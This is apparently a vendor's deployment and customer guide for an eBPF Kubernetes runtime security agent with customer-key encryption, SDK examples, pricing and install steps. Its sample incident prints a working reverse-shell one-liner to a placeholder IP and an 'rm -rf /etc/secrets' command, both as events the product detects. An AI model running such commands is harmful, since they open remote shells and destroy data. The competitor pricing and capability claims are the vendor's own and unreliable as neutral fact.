Tier 3 Deployment & Customer Guide
Overview
Tier 3 (codename EcheDeep) is EchelonGraph's eBPF-based runtime security agent. It runs entirely on your Kubernetes cluster and feeds telemetry to your EchelonGraph SaaS tenant — encrypted with your own keys before it ever leaves your environment.
> Zero-knowledge by design. Your raw traffic, process events, and runtime findings are encrypted on-host with a per-event Data Encryption Key (DEK), wrapped under your customer-managed KMS key (AWS / GCP / Vault), and shipped as ciphertext. EchelonGraph SaaS stores ciphertext + indexed metadata only. Without your KMS, we cannot decrypt.
Shipped capabilities (chart 0.3.0 · agent 1.16.0, all 14 phases live):
- T3.0 — Helm chart + ZK pipeline + agent enrollment
- T3.1 — eBPF multi-hook (XDP + TC + tracepoints) with safety scanner
- T3.2 — PII auto-stripping (11 default rules) + envelope encryption
- T3.3 — Shadow API discovery (HTTP/2, gRPC, GraphQL, WebSocket, TLS-SNI)
- T3.4 — Process monitoring (5 detection rule families with MITRE mapping)
- T3.5 — ML anomaly detection (24h baseline + EWMA + 4 rules)
- T3.6 — Threat intelligence (abuse.ch URLhaus + Feodo Tracker, CISA KEV, custom STIX 2.1 / TAXII 2.1)
- T3.7 — Auto-remediation (9 K8s + Terraform patch templates, GitHub PR mode, Slack notifications)
- T3.8 — Hardware KMS (AWS / GCP / Vault) with async DEK rotation
- T3.9 — Custom compliance framework builder (DORA / NIS2 / CMMC / FedRAMP templates)
- T3.10 — Enterprise packaging (Helm OCI, Grafana dashboard, 11 PrometheusRule alerts, air-gap bundle)
- T3.11 — Browser SDK (Vault Transit) — TypeScript SDK using Web Crypto API for in-browser ZK decryption; backend GET /api/v1/zk/config; migration 045
tenant_zk_configtable; admin PUT/DELETE for provider config - T3.12 — Browser SDK AWS KMS — hand-rolled SigV4 signer (Web Crypto HMAC-SHA256), ~7 KB gzipped; auth via Cognito Identity Pool / AssumeRoleWithWebIdentity / IAM Roles Anywhere
- T3.13 — Browser SDK GCP Cloud KMS — REST + bearer-token, ~3 KB gzipped; auth via Google Identity Services / Workload Identity Federation
Zero-Knowledge Architecture — what we see vs. what we don't
The single most-asked question from prospective customers is: *"What can EchelonGraph staff actually read about my workloads?"* Honest answer:
What we see (indexed metadata)
- Tenant ID + agent ID + pod ID + namespace name
- Rule ID of every emitted finding (e.g.
T3.4-PROC-REVERSE-SHELL,T3.6-IOC) - Severity + MITRE ATT&CK technique tag
- Timestamp + event count
- Wrapped DEK (your KMS-encrypted key — useless to us without your KMS)
- Ciphertext payload of the actual event detail
What we cannot decrypt without your KMS
- Process command lines (
/bin/bash -c "rm -rf /etc/secrets") — encrypted - Destination IP addresses of network connections — encrypted
- HTTP request paths + headers — encrypted (PII headers stripped before encryption)
- File paths accessed by sensitive processes — encrypted
- Shell environment variables — encrypted
- TLS SNI hostnames + DNS query targets — encrypted
But how do alerts work if you can't read our data?
This is the most-asked question, and the answer is straightforward: detection happens on your servers, before encryption. The EchelonGraph agent on your host runs the ML anomaly engine, process monitoring rules, threat-intel matching, shadow API discovery, and all detection logic — locally, while the data is still in plaintext. By the time anything reaches our cloud, the *decision* ("is this suspicious?") has already been made.
Each finding has two parts:
| Part | Encrypted? | What we use it for |
|---|---|---|
| Metadata | No (plaintext) | Routing alerts to Slack/PagerDuty/email/webhooks, populating dashboards, computing compliance scores, threshold-based alerting, MITRE ATT&CK heatmaps |
| Payload | Yes — locked with your KMS | Only forensic investigation — your analyst unlocks it in their browser when they click "view details" |
What's in the metadata (we read this freely, this is what powers your alerts):
- Rule ID (e.g.
T3.4-PROC-REVERSE-SHELL,T3.6-IOC-MATCH,T3.5-ANOMALY-TRAFFIC-SPIKE) - Severity (critical / high / medium / low)
- MITRE ATT&CK technique tag (e.g.
T1059.004shell + scripting) - Timestamp + event count
- Tenant ID, agent ID, pod name, namespace
- Confidence score (0–1)
What's in the encrypted payload (we cannot read this):
- Process command lines (e.g.
/bin/bash -c "rm -rf /etc/secrets") - File paths accessed by sensitive processes
- Destination IP addresses + DNS query targets
- HTTP request bodies + headers (with PII auto-stripped before encrypt)
- TLS SNI hostnames
- Shell environment variables
So when your alert fires saying **"5 reverse-shell attempts in production namespace in the last 10 minutes"**, the count + rule + namespace are all plaintext metadata. We can route the alert. When the on-call analyst clicks the alert and wants to see *which* processes triggered it — that's when their browser unlocks the encrypted payload via your KMS.
> Why this split is the right call. Detection logic is > heavy compute and needs the raw data — running it close to the data > (on your host) is faster and more accurate. Alert routing is > orchestration; it just needs to know "something fired" plus a few > metadata fields. Investigation is rare (1–2% of findings); it's > reasonable for those to require an extra step (browser unlock). > The trade-off: we lose the ability to retroactively re-run detection > on old data — that has to happen on your host with a fresh agent > version.
How your data stays private — end-to-end
In a single picture: data is locked the moment it's collected on your servers, only the locked version is sent to us, and the only place it ever gets unlocked is inside your analyst's browser — using a key that comes directly from your encryption service, not from us.
Your encryption service
YOU CONTROLAWS · GCP · VaultIn your cloud account, never EchelonGraph's. Both step 1 (your agent) and step 3 (your analyst's browser) call this service directly to lock and unlock data. We never call it. We never have a copy of the key.
- Your master key NEVER leaves your account
- All locking & unlocking happens in your KMS hardware
- Every unlock is written to your KMS audit log
Your servers
YOU CONTROLEchelonGraph agent runs here
- Watches what's happening on your computers
- Locks each piece of data the moment it's collected
- Calls YOUR encryption service to lock the key — never us
EchelonGraph cloud
ECHELONGRAPH SAASWe only ever see locked data
- Stores locked data plus the alert metadata (when, what type)
- Cannot unlock — we don't have your key
- Even a database breach keeps your data unreadable
Your analyst's browser
YOU CONTROLThe only place data gets unlocked
- Browser unlocks the data key by calling YOUR KMS directly
- The unlock request never passes through EchelonGraph
- Key wiped from browser memory the moment they navigate away
Why we can't read your data, even if we wanted to
This isn't a marketing claim — it's how the system is built. Every statement below is something you can independently verify, either with your cloud provider, with your browser's developer tools, or by reading our open-source code.
Your master key never leaves your account
EchelonGraph never has a copy of your encryption key. It stays inside your AWS, GCP, or Vault account — locked in tamper-resistant hardware, like a physical safe.
Backed by
- We only call your encryption service to lock and unlock data — we never receive the key itself
- Your provider's hardware physically prevents the key from being copied out
- Even our own staff would have nothing to leak in a worst-case breach
Decryption happens in your browser, not on our servers
When your analyst clicks "view details", their browser unlocks the data directly. The unlock request goes from their computer straight to your encryption service — it never passes through us.
Backed by
- Your browser → your AWS / GCP / Vault, direct, no proxy
- EchelonGraph is offline during decryption — we don't see the unlocked data
- Your corporate firewall logs will confirm this independently
Even if EchelonGraph vanished, your data stays safe
We only ever store the locked version. If our company shut down tomorrow, what we hold remains permanently unreadable to anyone — including any future buyer, our former employees, or anyone who breaches our database.
Backed by
- We can't be subpoenaed into producing plaintext we don't have
- Court orders against us don't bypass your encryption — they hit a wall
- Built-in compliance with GDPR Art. 25 (data minimisation), DPDP, EU DORA, US CMMC 2.0
Every unlock is recorded in your audit trail
Your cloud provider logs every single time anyone unlocks a piece of your data — including which person unlocked it. The logs always show your team members' names, never EchelonGraph's, because we never make the call.
Backed by
- Logs are written by your provider, not by us — we can't tamper with them
- If our staff ever decrypted your data, the log would prove it (and we'd be in violation)
- Many auditors accept this log as standalone proof of zero-knowledge
The decryption code is open-source — verify it yourself
The exact code that runs in your browser to unlock data is published under Apache 2.0. Any developer on your team can read every line. We've also published 111 automated tests showing what it does.
Backed by
- Tests prove the wire format, the auth flow, and that keys are wiped from memory
- Pull request history shows every change to the security-critical code
- Your team can audit, fork, or replace it without permission from us
How your dashboard actually calls your KMS to unlock data
The diagram above shows the flow at the architecture level. Here's the same flow at the code level — what your developer wires into your dashboard. The pattern is the same shape for every provider: your dashboard's auth layer fetches a token or credentials from the customer's IdP, then hands them to the SDK's React hook. The SDK calls the customer's KMS directly when an analyst clicks "view locked details" — never through EchelonGraph.
How HashiCorp Vault works: Customer signs into Vault via OIDC; dashboard captures the X-Vault-Token and passes it to the SDK.
1. Get a Vault token by signing the user into Vault via your IdP (Okta / Azure AD / Auth0 / Google Workspace) using Vault's OIDC auth method.
// In your dashboard's auth layer
async function getVaultToken(): Promise<string> {
// Your IdP returns an OIDC code for the signed-in user.
// Vault exchanges it for a Vault token.
const oidcCode = await window.myIdP.getOidcCode();
const res = await fetch(
"https://vault.your-company.com/v1/auth/oidc/login",
{ method: "POST", body: JSON.stringify({ code: oidcCode }) }
);
const json = await res.json();
return json.auth.client_token; // valid for ~1 hour by default
}2. Use the token in a dashboard component. The SDK sends it as X-Vault-Token directly to YOUR Vault — no proxy through EchelonGraph.
import { useZkConfig, useZkDecrypt } from "@echelongraph/zkdecrypt";
function FindingDetail({ finding, jwt }) {
const [vaultToken, setVaultToken] = useState<string | null>(null);
useEffect(() => { getVaultToken().then(setVaultToken); }, []);
const { config } = useZkConfig(jwt); // GET /api/v1/zk/config
const { decrypt } = useZkDecrypt(config, {
vaultToken: vaultToken ?? "", // your token, not ours
});
return (
<button onClick={async () => {
const { plaintext } = await decrypt({
envelope: finding.encryptedPayload, // from EchelonGraph API
tenantId: finding.tenantId,
agentId: finding.agentId,
});
// Decryption happened in this browser; plaintext is a Uint8Array
console.log(new TextDecoder().decode(plaintext));
}}>
View locked details
</button>
);
}- Vault token is short-lived — the SDK surfaces 401/403 as kms_auth_failed; re-prompt for OIDC login when you see that
- Your customer's IAM grants Vault Transit decrypt permission on the configured key — check your Vault audit log to see every unlock
For the complete API reference (envelope wire format, error codes, retry policy, browser/Node compatibility, dispose lifecycle, & admin write endpoint to configure your KMS), see /docs/tier3-zk-decryption. The SDK source is open under Apache 2.0 at frontend/src/lib/zkdecrypt/.
A complete incident — end-to-end with realistic data
Everything above is architecture and code. Here's what an actual production incident looks like, step by step, with real-shaped sample data at every layer of the pipeline. Follow the timeline from kernel-level eBPF detection through to GitHub-PR-driven auto- remediation. Watch the green boxes (data we can read freely) and the red boxes (data we cannot read at all) — that contrast is the entire zero-knowledge promise made concrete.
- T+0.000sYour host (worker-3.acme-prod)·eBPF kernel hook
Reverse-shell process spawns inside a production pod
At14:32:07.123 UTC, the gunicorn worker in thecheckout-apideployment forks a new bash process. The eBPF tracepoint hook on the customer's host captures theexecvesystem call and forwards it to the EchelonGraph agent for evaluation.Raw kernel event (only on customer's host)✓ PlaintextPID: 3847 PPID: 3128 (gunicorn) Comm: bash Args: /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1" Cwd: /tmp UID: 33 (www-data) Pod: checkout-api-pod-7b9c NS: production Node: worker-3.acme-prodThis data NEVER leaves the host in plaintext. - T+0.012sEchelonGraph agent (Tentacle DaemonSet)·Detection engines run locally
Two detection rules fire on the customer's host
The agent evaluates the event against every Tier 3 detection engine, all running locally on the customer's host with full plaintext access. Two rules match: the process-monitor flags the bash command line as a reverse shell (T3.4), and the threat-intel matcher recognises the destination IP from the abuse.ch / CISA KEV feeds (T3.6).Local detection result (still on host, plaintext)✓ Plaintextrules_matched: [T3.4-PROC-REVERSE-SHELL, T3.6-IOC-MATCH] mitre_technique: T1059.004 (Unix Shell) severity: critical confidence: 0.97 ioc_source: abuse.ch URLhaus + CISA KEV finding_id: f-9d4e2a17 event_count: 1Detection logic runs in-process on the host. By this point the verdict is already final — EchelonGraph cloud never participates in detection. - T+0.018sEchelonGraph agent·Encrypt + ship
Agent locks the sensitive payload before shipping
The agent generates a fresh 32-byte data key (DEK), AES-256-GCM encrypts the sensitive details (command line, file paths, destination IP, etc.), and asks the customer's KMS to wrap the DEK. The wrapped DEK plus ciphertext are bundled with the plaintext metadata and shipped over TLS 1.3 gRPC.Plaintext metadata sent to EchelonGraph✓ Plaintext{ "tenant_id": "acme-corp", "agent_id": "tentacle-worker-3", "rule_id": "T3.4-PROC-REVERSE-SHELL", "severity": "critical", "mitre_technique": "T1059.004", "ts": "2026-05-07T14:32:07.123Z", "pod": "checkout-api-pod-7b9c", "namespace": "production", "confidence": 0.97, "ioc_match": "T3.6-IOC-MATCH", "event_count": 1 }EchelonGraph reads this freely — it's how alerts get routed.Encrypted payload (locked with the customer's KMS)🔒 We CANNOT readnonce (12 bytes hex): a3f2e1c509bb47c1d4e832af ciphertext (245 bytes b64): kJh3T9xQ4Z2wL1vPdR8mN0yQp7Vk sB8xJq2fT5rY3wHmN9pK4tA0iL6e ... (truncated, 245 bytes total) AEAD tag (16 bytes hex): e1f8d3c4b29a5e6708d2f4a1 wrapped-DEK (KMS blob): AQECAHj8H5jK4Z9wL...Without the customer's KMS key, this is just random bytes — even our own DBA can't reconstruct the command line. - T+0.450sEchelonGraph cloud·Ingester → CloudSQL + ClickHouse
EchelonGraph stores the row — ciphertext stays opaque to us
The Ingester validates the wire format, writes the metadata columns to Postgres for the alert layer to query, and pushes the ciphertext + wrapped-DEK to ClickHouse with a 90-day retention TTL. We index every metadata field for routing, compliance reporting, and dashboard queries.Stored row (what an EchelonGraph engineer can SELECT)✓ Plaintexttenant_id | acme-corp rule_id | T3.4-PROC-REVERSE-SHELL severity | critical mitre_technique | T1059.004 ts | 2026-05-07 14:32:07.123 pod | checkout-api-pod-7b9c namespace | production confidence | 0.97 ioc_match | T3.6-IOC-MATCH encrypted_payload | \xa3f2e1c509bb...e1f8d3c4 ← unreadable wrapped_dek | \xAQECAHj8H5jK4Z9wL... ← unreadableOur staff can run analytics on metadata. The two unreadable columns are what protects you. - T+0.620sEchelonGraph alert manager·Slack / PagerDuty / webhook routing
Alert fires — built entirely from plaintext metadata
A pre-configured rule (“CRITICAL severity in production namespace”) matches. Alert manager builds a Slack message using the metadata fields only and POSTs it to the customer's Slack webhook. The encrypted payload is not touched.Slack message that fires in #soc-prod-alerts✓ Plaintext🚨 CRITICAL: Reverse shell in production Tenant: acme-corp · Pod: checkout-api-pod-7b9c Namespace: production · Confidence: 97% MITRE: T1059.004 (Unix Shell) IOC match: known C2 from abuse.ch URLhaus Time: 2026-05-07 14:32:07 UTC [Investigate ↗] [Acknowledge] [Auto-remediate]The Slack message has zero plaintext details from the encrypted payload. Routing works fine without us reading anything. - T+27sAlice (SOC analyst)·Opens app.echelongraph.io/findings/f-9d4e2a17
Analyst opens the dashboard from the Slack alert
Alice clicks [Investigate ↗] in Slack. Her browser navigates toapp.echelongraph.io, the SPA loads, the dashboard fetches the finding. The metadata renders immediately — but the “What process ran?”, “Where did it connect?”, and “Full command-line” sections show a 🔒 Locked — click to unlock placeholder. - T+30sBrowser SDK (frontend/src/lib/zkdecrypt)·Calls Alice's Vault DIRECTLY
Browser unlocks the data key via Vault — bypasses EchelonGraph
Alice clicks “view locked details”. Her browser already has a Vault token from this morning's OIDC sign-in (cached insessionStorage). The SDK POSTs the wrapped DEK tovault.acme.comdirectly. Vault unwraps it inside its HSM and returns the plaintext DEK. The SDK runs AES-GCM decrypt in the browser using Web Crypto API. Plaintext renders.zeroBytes(DEK)wipes the key from JS heap.Browser → Vault POST (visible in DevTools Network tab)🔐 Customer's KMSPOST https://vault.acme.com/v1/transit/decrypt/echelongraph X-Vault-Token: hvs.CAESI... ← Alice's OIDC-derived token Content-Type: application/json { "ciphertext": "vault:v1:AQECAHj8H5jK4Z9wL..." ← wrapped DEK } ← Response from Vault: { "data": { "plaintext": "kJh3T9xQ4Z2wL1vPdR8mN0y..." } }Open Alice's DevTools Network tab and you'll see this exact request going to vault.acme.com — NOT to echelongraph.io.Plaintext rendered in Alice's browser (and only there)✓ PlaintextProcess command line: /bin/bash -c "bash -i >& /dev/tcp/198.51.100.74/4444 0>&1" Working directory: /tmp UID: 33 (www-data) — gunicorn's own user, no privilege escalation PID: 3847 · Parent: gunicorn (PID 3128) Destination: 198.51.100.74:4444 IOC source: abuse.ch URLhaus First seen: 2026-04-22 — known C2 for "RedShell" toolkitThis text exists only in Alice's browser tab memory. When she navigates away, dispose() wipes it. - T+30.5sAcme's Vault audit log·Records the unlock with caller identity
Vault writes an audit-log entry — proving Alice unlocked it, not us
Vault's audit log records everyDecryptcall with the caller's federated identity. Acme's SOC team (or external auditor) can grep this log to confirm that EchelonGraph staff have never made a decrypt call against their key.Acme's Vault audit log (their copy, written by their Vault)📜 Customer's log2026-05-07 14:32:37 UTC — vault.transit.decrypt caller_id: alice@acme-corp.com auth_method: oidc/okta key_name: echelongraph success: true request_id: 7c45-ab12-9e30-4f15 remote_addr: 203.0.113.45 (Alice's office IP)The caller_id is Alice's IdP identity — never an EchelonGraph staff identity, because we never make the call. - T+45sAuto-remediation engine (T3.7)·Generates IaC patch + opens GitHub PR
Alice triggers auto-remediation — a NetworkPolicy PR opens
Alice clicks Auto-remediate. The remediation engine selects the K8s NetworkPolicy template (matching the finding's category), substitutes the offending pod labels, and opens a GitHub PR inacme-corp/infra-iac. Alice (admin role) clicks Merge → ArgoCD applies the policy → the compromised pod loses egress in < 60 seconds.Auto-generated NetworkPolicy (committed to acme-corp/infra-iac)✓ PlaintextapiVersion: networking.k8s.io/v1 kind: NetworkPolicy metadata: name: deny-egress-checkout-api-incident-f9d4e2a17 namespace: production annotations: echelongraph.io/finding: f-9d4e2a17 echelongraph.io/rule: T3.4-PROC-REVERSE-SHELL spec: podSelector: matchLabels: app: checkout-api policyTypes: [Egress] egress: [] # deny all outbound trafficPR opened by github-app/echelongraph-bot · approved by alice@acme-corp.com · merged at 14:33:41 · ArgoCD synced at 14:34:09.
Detection ran on Acme's host (T+0 to T+18 ms). Encryption + ship took ~430 ms over TLS 1.3 gRPC. Alert routed to Slack 620 ms after the kernel event. Alice opened the dashboard, unlocked the encrypted payload via her own Vault, triggered remediation, and had the compromised pod isolated within a minute. Throughout the entire incident, EchelonGraph never read the bash command line, the destination IP, or any other detail of the actual exploit— only the metadata needed to route the alert. Acme's Vault audit log proves it: every Decrypt call shows alice@acme-corp.com as the caller, never an EchelonGraph identity.
Two decryption paths
Browser SDK (T3.11+) — the dashboard at app.echelongraph.io renders decrypted detail in the operator's browser using the open-source @echelongraph/zkdecrypt TypeScript SDK. Customer signs into their KMS via OIDC; the SDK calls the customer's Vault / AWS / GCP KMS directly from the browser to unwrap each event's DEK. EchelonGraph backend never sees the plaintext.
* Vault Transit — shipped in T3.11. * AWS KMS via SigV4 + Cognito / STS federation — shipped in T3.12. * GCP Cloud KMS via Google Identity Services / Workload Identity Federation — shipped in T3.13.
Go SDK (sdk/zkdecrypt) — for SOC pipelines, SIEM forwarders, and analytics notebooks. Customer fetches the KEK from their KMS via the provider CLI (aws kms decrypt, gcloud kms decrypt, vault read), passes it to the SDK along with the encrypted envelope, gets back plaintext. Run anywhere Go runs — Lambda, Cloud Run, on-prem worker.
Both paths share the same envelope wire format. See /docs/tier3-zk-decryption for the full SDK reference.
Verifying the property
# Inspect the ciphertext directly in your CloudSQL — should be unreadable.
gcloud sql connect ... --database=echelongraph
> SELECT id, encrypted_payload FROM zk_telemetry LIMIT 1;The encrypted_payload column is AES-256-GCM ciphertext. Even with full read access to our DB, an attacker (or an EchelonGraph employee) cannot reconstruct the underlying event.
Customer responsibilities
When you onboard Tier 3, here's what's on your side vs. ours:
| Responsibility | You | EchelonGraph |
|---|---|---|
| Provision Helm chart on your cluster | ✓ | — |
| Provide a customer-managed KMS key | ✓ | — |
| Set IAM policy / Vault token for the agent | ✓ | — |
| Configure NetworkPolicy egress to ingest endpoint | ✓ | — |
| Maintain agent upgrades (chart minor bumps) | ✓ (we publish; you helm upgrade) | — |
| Operate the SaaS dashboard / API | — | ✓ |
| Maintain ingest pipeline, storage, indexing | — | ✓ |
| Run feed updates (URLhaus, CISA KEV) | — | ✓ (agent pulls; you can air-gap) |
| Define custom compliance frameworks | ✓ | — |
| Approve auto-remediation patches | ✓ (admin RBAC) | — |
One-time onboarding (~15 min)
- Create a KMS key. AWS:
arn:aws:kms:...; GCP:projects/.../cryptoKeys/...; Vault:transit/keys/echelongraph. - Grant the agent's principal
Encrypt+Decrypton that key only. - Generate a one-time enrollment OTP in your dashboard (Settings → Agents → New).
helm installthe chart with the OTP + KMS config. The agent auto-enrolls.- Verify via
kubectl port-forward+/readyz(returns 200 once eBPF hooks attach).
After step 5, your dashboard's "Connected Agents" indicator goes green and findings start flowing.
Pricing model
EchelonGraph Tier 3 prices on node count, not on event volume — your cost is predictable regardless of traffic spikes.
| Plan | Price | Nodes | Includes |
|---|---|---|---|
| Team | $49/node/month | up to 50 | All T3.0–T3.10 features, AWS/GCP/Vault KMS, 30-day retention |
| Pro | $149/node/month | up to 250 | Team + 1-year retention + auto-remediation PR mode + custom compliance |
| Enterprise | Contact sales | unlimited | Pro + air-gapped install + dedicated SaaS region + custom SLA |
Volume discounts apply at 100+ / 500+ / 1000+ nodes.
Cost comparison vs. competitors
For a typical mid-size deployment (100 nodes, 50K events/sec average):
| Vendor | Annual cost (est.) | Notes |
|---|---|---|
| EchelonGraph Tier 3 (Pro) | $178,800 | $149 × 100 × 12 — flat node price |
| Sysdig Secure | ~$240,000 | Per-node + per-image scanning + per-host runtime; tiered pricing |
| Aqua CSPM + Runtime | ~$280,000 | Per-workload + per-cluster + add-on for agentless runtime |
| Falco Cloud (Sysdig) | ~$192,000 | Per-node, no auto-remediation, no compliance builder, no KMS BYOK |
| Wiz Runtime Sensor | ~$320,000+ | Bundled w/ CNAPP suite — minimum bundle pricing |
Why Tier 3 costs less:
- No per-image scanning charge — Tier 3 doesn't replicate the Tier 1/2 cloud + image scanning surface; that's already covered by EchelonGraph's other tiers.
- No per-event metering — your traffic spike doesn't change your bill.
- Self-hosted agent — we don't run inference servers on your data; you pay for SaaS dashboard + indexing only.
- BYOK is included — Sysdig charges $50K+ for "private cloud" SKUs that include customer-managed encryption.
Why we cost what we do
- R&D: every detection rule has a documented MITRE ATT&CK mapping, a reference to a public threat report, and an integration test. Detection quality is our moat.
- Custom compliance builder: DORA / NIS2 / CMMC / FedRAMP templates ready out-of-box. Most competitors charge add-ons.
- Hardware KMS: AWS + GCP + Vault native — not "bring a CSV of indicators" or "managed inside our cloud."
- Auto-remediation: 9 IaC patch templates with audit trail + admin approval workflow. Sysdig/Aqua charge for "remediation packages" as add-ons.
- Air-gapped support:
scripts/airgap-bundle.shships a complete tarball; no phone-home required.
Security comparison
| Capability | Tier 3 | Sysdig | Aqua | Falco | Wiz |
|---|---|---|---|---|---|
| Zero-knowledge data plane (BYOK encryption) | ✓ | ✗ | ✗ | ✗ | ✗ |
| Kernel-level eBPF telemetry | ✓ | ✓ | ✓ | ✓ | ✓ (sensor) |
| Process monitoring + reverse-shell detection | ✓ | ✓ | ✓ | ✓ | ✓ |
| Network anomaly detection (ML-statistical) | ✓ | ✓ | ✗ | ✗ | ✓ |
| Custom compliance framework builder | ✓ | ✗ | partial | ✗ | partial |
| Auto-remediation IaC PR generation | ✓ | ✗ | ✗ | ✗ | ✗ |
| Air-gapped mode (no phone-home) | ✓ | partial | ✓ | ✓ | ✗ |
| AWS / GCP / Vault KMS integration | ✓ | ✗ | partial | ✗ | ✗ |
| Per-tenant suppression rules | ✓ | ✗ | ✗ | ✗ | ✗ |
| Threat-intel: STIX 2.1 + TAXII 2.1 native | ✓ | partial | ✗ | ✗ | partial |
| MITRE ATT&CK auto-tagging | ✓ | ✓ | ✓ | partial | ✓ |
| EU GDPR / DPDP Article-25 by design | ✓ | partial | partial | ✗ | partial |
| Open-source customer SDK (zkdecrypt) | ✓ | ✗ | ✗ | ✓ (rule lang) | ✗ |
Three things only EchelonGraph Tier 3 does
- Zero-knowledge data plane. Your encrypted payload arrives at our infrastructure — and we cannot decrypt it. Sysdig/Aqua/Wiz all have access to your raw event data; Falco runs entirely on-prem (no SaaS analytics).
- End-to-end auto-remediation with admin approval. Detect → generate IaC patch (Terraform / K8s / Helm) → open PR → admin approves → apply. Sysdig + Aqua have advisory remediation; only ours closes the loop while keeping a full audit trail.
- Customer-defined compliance frameworks. DORA / NIS2 / CMMC / FedRAMP templates plus the option to build your own (versioned, immutable-once-published, JSON portable). Sysdig/Aqua ship fixed framework catalogs.
Installation
1. Pull the chart
helm pull oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.02. Configure KMS
Pick one provider — see the per-provider setup guide:
- AWS KMS: AWS KMS Setup
- GCP Cloud KMS: GCP Setup
- HashiCorp Vault Transit: Vault Setup
3. Enroll + install
export ECHELON_AGENT_ENROLL_TOKEN="<otp from dashboard>"
helm upgrade --install echelongraph-tier3 \
oci://us-central1-docker.pkg.dev/echelongraph-prod/echelon-customer/echelongraph-tier3 --version 0.3.0 \
-n echelongraph-system --create-namespace \
--set tenant.id="<your-tenant-id>" \
--set secrets.encryptionKey="$(openssl rand -hex 32)" \
--set secrets.enrollmentToken=$ECHELON_AGENT_ENROLL_TOKEN \
--set secrets.enrollmentEndpoint="https://app.echelongraph.io" \
--set ingester.address="ingest.echelongraph.io:443"
# For an external KMS provider (AWS/GCP/Vault) instead of the in-cluster BYOK
# key, configure it per the KMS setup links in step 2.4. Verify
kubectl get pods -n echelongraph-system
# tier3-master-xxx 1/1 Running
# tier3-tentacle-xxx 1/1 Running per node
# Health (port-forward — agent images are distroless, no shell)
kubectl port-forward -n echelongraph-system deploy/tier3-master 8087:8087 &
curl -sS http://localhost:8087/readyz
# 200 OK once eBPF hooks attach + ingester reachableIn your EchelonGraph dashboard, the agent should show "Connected" within 30 seconds.
Air-gapped customers
For environments with no outbound internet (regulated finance, government, defense):
# 1. On a connected machine, build the bundle.
./scripts/airgap-bundle.sh --version=1.10.1 --include-ioc
# 2. Transfer the .tar.zst to your air-gapped network.
# 3. Load images into your private registry.
# 4. helm install with TIER3_AIRGAPPED=true and image overrides.The bundle includes:
- Master + Tentacle Docker images
- Helm chart (.tgz)
- Grafana dashboard JSON
- Prometheus alert rules
- (Optional) IOC database snapshot at bundle time
What customers do NOT need to do
- No CVE database maintenance. Tier 3 pulls abuse.ch URLhaus + Feodo Tracker + CISA KEV automatically (every 6h). Air-gapped customers ship snapshots in the bundle.
- No anomaly model training. The statistical baseline (24h rolling window + EWMA + seasonality) is fully unsupervised; warm-up takes 24h after install.
- No rule authoring for the basics. 30+ detection rules ship out-of-box (T3.4 process + T3.5 anomaly + T3.6 IOC). Custom rules are optional.
- No on-call. Alerts route to your existing PagerDuty / Slack / email via the standard PrometheusRule we ship.
Operational reference
| Doc | Topic |
|---|---|
| TIER3_DEPLOYMENT.md | Customer install + config + troubleshooting catalog |
| TIER3_KMS_SETUP.md | AWS / GCP / Vault setup with IAM permissions per provider |
| TIER3_BACKUP_RESTORE.md | Postgres + ClickHouse export/import + RTO/RPO matrix |
| UPGRADING.md | Version compatibility matrix + per-version migration list |
| CHANGELOG.md | Full release history |
Confidence checklist for security review
If your security team is evaluating Tier 3, here's the audit trail they typically request:
- [ ] eBPF verifier compliance — every program is loaded via cilium/ebpf with the kernel verifier; programs that fail validation are rejected at load time.
- [ ] Unprivileged by default — tentacle runs with a least-privilege capability set (
CAP_SYS_ADMIN,CAP_BPF,CAP_NET_ADMIN), not a fully-privileged container; full privilege is an opt-in escape hatch for restrictive kernels only. No host filesystem write. No host network. - [ ] Customer-managed encryption keys —
TIER3_KMS_PROVIDERchooses your KMS; envelope encryption uses per-event DEK wrapped by your KEK. We document that we never see plaintext. - [ ] Open-source SDK —
sdk/zkdecryptis the canonical decryption path; auditable Go. - [ ] No outbound from the agent beyond
ingest.echelongraph.io:443. Air-gapped mode disables even that. - [ ] License feature flags — every paid feature is gated behind a license claim signed by EchelonGraph; rotation supported.
- [ ] Open-source threat-intel feeds — abuse.ch + CISA KEV are public; the agent never sends *your* findings to those upstream services.
- [ ] Audit log for every admin-grade action (remediation approve, framework publish, agent enrollment).
Uninstall
helm uninstall echelongraph-tier3 -n echelongraph-system
kubectl delete namespace echelongraph-systemThe agent self-zeroes its DEK on shutdown. Wrapped DEKs in our backend remain (we can't decrypt anyway); for full removal, contact support@echelongraph.io with a tenant deletion request and we'll TRUNCATE the ciphertext rows.